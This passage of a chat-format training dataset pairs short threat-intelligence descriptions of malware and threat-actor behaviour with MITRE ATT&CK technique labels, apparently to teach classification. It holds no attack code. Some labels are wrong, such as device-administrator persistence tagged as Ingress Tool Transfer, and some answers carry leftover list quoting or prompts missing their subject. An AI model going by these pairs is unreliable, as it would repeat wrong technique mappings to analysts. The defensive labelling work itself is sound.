- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DustySky collects information about running processes from victims."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA551 has distributed different families of malware, including Ursnif (Gozi/ISFB), Valak and IcedID. TA551 malspam spoofs legitimate email chains based on data retrieved from previously infected Windows hosts. This is a generic statement asking the recipient to open an attached ZIP archive using the supplied password. File names for the ZIP archives use the name of the company being spoofed in the email. For example, if the spoofed sender is someone@companyname.com, the ZIP attachment would be named companyname.zip. In 2020, we also started seeing emails with info.zip or request.zip as the attached ZIP archive names. These password-protected ZIP attachments contain a Word document with macros to install malware. File names for the extracted Word documents follow noticeable patterns that have evolved as this campaign has progressed. URLs generated by the associated Word macros also follow noticeable patterns that have also evolved as this campaign has progressed"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has created forged Kerberos Ticket Granting Ticket (TGT) and Ticket Granting Service (TGS) tickets to maintain administrative access."
- },
- {
- "role": "assistant",
- "content": "T1550.003 - Use Alternate Authentication Material: Pass the Ticket"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MobileOrder starts by registering itself as device administrator so that a normal user cannot uninstall it by simply clicking “uninstall” in settings"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The final payload is a ZIP archive that is usually encrypted by the algorithm shown in Figure 8 and, in a significant number of cases, we saw it being password-protected as well"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "zwShell can modify the Registry."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ramsay implements a decentralized way of storing these artifacts among the victim’s file system by using inline hooks applied on two Windows API functions, WriteFile and CloseHandle"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WarzoneRAT can use PowerShell to download files and execute commands."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ruler can be used to automate the abuse of Outlook Rules, Forms, and Home Pages to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1137 - Office Application Startup"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EXOTIC LILY has used malicious documents containing exploits for CVE-2021-40444 affecting Microsoft MSHTML."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kasidet has the ability to search for a given process name in processes currently running in the system."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once all the tasks have been executed completely, the malware breaks the loop, sends the termination buffer back, and clears all the footprints from the targeted machine: Deletes the LNK file from the startup directory"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LAPSUS$ has used Windows built-in tool `ntdsutil` to extract the Active Directory (AD) database."
- },
- {
- "role": "assistant",
- "content": "T1003.003 - OS Credential Dumping: NTDS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TYPEFRAME has used ports 443, 8080, and 8443 with a FakeTLS method."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM has been delivered via spearphishing attachments disguised as PDF documents."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In this case, we can see the binary installation path and local reconnaissance to determine which flavor of Linux the malware is running. This is followed by a number of Linux shell command style commands related to the malware establishing persistence"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The main purpose of P8RAT is downloading and executing payloads (consisting of PE and shellcode) from its C2 server. However, we were unable to obtain any sample of the subsequent payloads for this malware"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lucifer has attempted to brute force TCP ports 135 (RPC) and 1433 (MSSQL) with the default username or list of usernames and passwords."
- },
- {
- "role": "assistant",
- "content": "T1110.001 - Brute Force: Password Guessing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 used RDP for lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "jRAT can list and manage startup entries."
- },
- {
- "role": "assistant",
- "content": "T1037.005 - Boot or Logon Initialization Scripts: Startup Items"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The domain fabianiarte.com (fabianiarte.it) was compromised to host backend server code and malicious DOTM files. This domain hosted DOTM files that were used to mimic defense contractors’ job profiles as observed in Operation North Star, but the domain also included some rudimentary backend server code that we suspect was used by the implant. According to our analysis of this cache of data this site was compromised to host code on 7/9/2020"
- },
- {
- "role": "assistant",
- "content": "T1584.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IronNetInjector has used a task XML file named \"mssch.xml\" to run an IronPython script when a user logs in or when specific system events are created."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Smoke Loader not only installs its original sample but also replaces it with a fresh version, which is downloaded from the C&C – path: http://<CnC address>/system32.exe. This trick makes detection more difficult – updated samples are repacked by a different crypter, may also have their set of C&Cs changed"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly used remote access services, including VPN and Outlook Web Access (OWA)."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerLess is written in and executed via PowerShell without using powershell.exe."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Donut includes a subproject \"DonutTest\" to inject shellcode into a target process."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADNEWS installs a registry Run key to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zeus Panda checks processes on the system and if they meet the necessary requirements, it injects into that process."
- },
- {
- "role": "assistant",
- "content": "T1055.002 - Process Injection: Portable Executable Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar can download and deploy additional payloads, including ransomware and post-exploitation frameworks such as Cobalt Strike."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BITTER has used scheduled tasks for persistence and execution."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sidewinder has used tools to identify running processes on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "By enabling this data connection, the user allows Excel to obtain content from the URL in the .iqy file. The contents within the releasenotes.txt file (SHA256: bf925f340920111b385078f3785f486fff1096fd0847b993892ff1ee3580fa9d) contains the following formula that Excel will save to the “A0” cell in the worksheet"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "P8RAT can download additional payloads to a target system."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OnionDuke steals credentials from its victims."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tarrask is able to create “hidden” scheduled tasks for persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NOKKI can delete files to cover tracks."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to obtain a directory listing."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY can conduct an image hijack of an `.msc` file extension as part of its UAC bypass process."
- },
- {
- "role": "assistant",
- "content": "T1546.001 - Event Triggered Execution: Change Default File Association"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When entered, these credentials are then sent to the C2 server, which allows DarkHydrus to collect the user account credentials"
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "STARWHALE has stored collected data in a file called `stari.txt`."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar can use Nltest tools to obtain information about the domain."
- },
- {
- "role": "assistant",
- "content": "T1482 - Domain Trust Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Doki was executed through an open Docker daemon API port."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "zwShell has deleted itself after creating a service as well as deleted a temporary file when the system reboots."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The document contains an encoded Visual Basic Script (VBScript) typical of previous Carbanak malware. Recent samples of the malware have now included the ability to use Google services for command-and-control (C&C) communication. The module is base64 encoded inside the main VBScript file along with various other VBScript modules used by the malware. When we analyzed the script we noticed that it is capable of using Google services as a C&C channel. Abusing Google for C&C communication . The \"ggldr\" script will send and receive commands to and from Google Apps Script, Google Sheets, and Google Forms services. It is unlikely that these hosted Google services are blocked by default in an organization, so it is more likely that the attacker will establish a C&C channel successfully. Upon the first attempt to contact the hard-coded Google Apps Script URL with the user's unique infection ID, the C&C will state that no spreadsheet currently exists for the user. The malware will then send two requests to another hard-coded Google Forms URL which will result in the creation of unique Google Sheets spreadsheet and Google Form IDs for the victim. The second time the Google Apps Script is requested, the C&C will return the unique Google Sheet and Google Form ID values: The \"entry\" value is also a unique ID which is sent with each subsequent Google Forms C&C request. Using Google as an independent C&C channel is likely to be more successful than using newly created domains or domains with no reputation"
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NotPetya determines if specific antivirus programs are running on an infected host machine."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "All of the backdoors identified - excluding RoyalDNS - required APT15 to create batch scripts in order to install its persistence mechanism"
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The observed attack technique (OAT) detection indicates that the php-cgi process represents a “/bin/bash” shell”and is directly reading “passwd”, suggesting that the server might have been compromised"
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Denis queries the Registry for keys and values."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Caterpillar WebShell can gather a list of processes running on the machine."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A file stealer can run a TaskScheduler DLL to add persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emissary has the capability to execute the command \"net start\" to interact with services."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has used a large-scale botnet to target Small Office/Home Office (SOHO) network devices."
- },
- {
- "role": "assistant",
- "content": "T1584.005 - Botnet"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Modify the shortcut that launches Telegram by replacing its path to the one corresponding to ‘exe’, as outlined below"
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoshC2 contains a module for exploiting SMB via EternalBlue."
- },
- {
- "role": "assistant",
- "content": "T1210 - Exploitation of Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT15 was also observed using Mimikatz to dump credentials and generate Kerberos golden tickets"
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The original Microsoft Excel spreadsheet is copied into the %TEMP% directory - The embedded object “xl\\embeddings\\oleObject1[.]bin” inside the Microsoft Excel spreadsheet is copied into the %TEMP% directory - The DLL inside oleObject1.bin is extracted and copied into %APPDATA% by the “ReadAndWriteExtractedBinFile” function - The DLL is loaded with LoadLibraryA - The DLL’s exported function, such as “Get2”, is run by the macro"
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Much like the previous version of Reaver, Reaver.v3 will query the necessary registry keys to determine the correct startup path to use"
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM has initiated connections to external domains using HTTPS."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XCSSET attempts to discover accounts from various locations such as a user's Evernote, AppleID, Telegram, Skype, and WeChat data."
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to download a file."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once the attacker gained access to the network with compromised credentials, they moved laterally using multiple different credentials. The credentials used for lateral movement were always different from those used for remote access"
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversaries can instruct Duqu to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials (via keylogging or other means). The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares', 'T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can delete all Registry entries created during its execution."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To facilitate the staging of BEACON on remote systems APT29 utilized a malicious certificate that allowed the group to impersonate a privileged user."
- },
- {
- "role": "assistant",
- "content": "T1588.004 - Digital Certificates"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Donut can patch Antimalware Scan Interface (AMSI), Windows Lockdown Policy (WLDP), as well as exit-related Native API functions to avoid process termination."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RemoteCMD can execute commands remotely by creating a new schedule task on the remote system"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Upon execution, the malware first decrypts its C2 IP address using a xor-incremental encryption and then creates a mutant, using its C2 IP address as the mutant’s name"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Naikon has convinced victims to open malicious attachments to execute malware."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Doki has searched for the current process’s PID."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT3 has used a keylogging tool that records keystrokes in encrypted files."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ObliqueRAT can gain persistence by a creating a shortcut in the infected user's Startup directory."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShimRat has the capability to upload collected files to a C2."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Amadey has checked for a variety of antivirus products."
- },
- {
